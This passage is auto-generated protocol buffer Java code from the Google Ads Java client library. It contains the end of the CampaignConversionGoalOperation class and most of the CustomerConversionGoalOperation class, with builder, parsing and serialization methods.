a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v21.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v21.resources.CampaignConversionGoal.newBuilder((com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> */ public com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.CampaignConversionGoal, com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.CampaignConversionGoal, com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder>( (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.services.CampaignConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.services.CampaignConversionGoalOperation) private static final com.google.ads.googleads.v21.services.CampaignConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v21.services.CampaignConversionGoalOperation(); } public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CampaignConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CampaignConversionGoalOperation>() { @java.lang.Override public CampaignConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CampaignConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CampaignConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v21.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/services/CustomerConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v21/services/customer_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v21.services; /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.CustomerConversionGoalOperation} */ public final class CustomerConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.services.CustomerConversionGoalOperation) CustomerConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CustomerConversionGoalOperation.newBuilder() to construct. private CustomerConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CustomerConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CustomerConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v21.resources.CustomerConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v21.services.CustomerConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v21.services.CustomerConversionGoalOperation other = (com.google.ads.googleads.v21.services.CustomerConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v21.services.CustomerConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v21.services.CustomerConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.services.CustomerConversionGoalOperation) com.google.ads.googleads.v21.services.CustomerConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v21.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v21.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v21.services.CustomerConversionGoalOperation build() { com.google.ads.googleads.v21.services.CustomerConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v21.services.CustomerConversionGoalOperation buildPartial() { com.google.ads.googleads.v21.services.CustomerConversionGoalOperation result = new com.google.ads.googleads.v21.services.CustomerConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v21.services.CustomerConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v21.services.CustomerConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v21.services.CustomerConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v21.services.CustomerConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v21.services.CustomerConversionGoalOperation other) { if (other == com.google.ads.googleads.v21.services.CustomerConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.CustomerConversionGoal, com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v21.resources.CustomerConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v21.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v21.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v21.resources.CustomerConversionGoal.newBuilder((com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> */ public com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v21.resources.CustomerConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.CustomerConversionGoal, com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v21.resources.CustomerConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.resources.CustomerConversionGoal, com.google.ads.googleads.v21.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v21.resources.CustomerConversionGoalOrBuilder>( (com.google.ads.googleads.v21.resources.CustomerConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.services.CustomerConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.services.CustomerConversionGoalOperation) private static final com.google.ads.googleads.v21.services.CustomerConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v21.services.CustomerConversionGoalOperation(); } public static com.google.ads.googleads.v21.services.CustomerConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CustomerConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CustomerConversionGoalOperation>() { @java.lang.Override public CustomerConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { 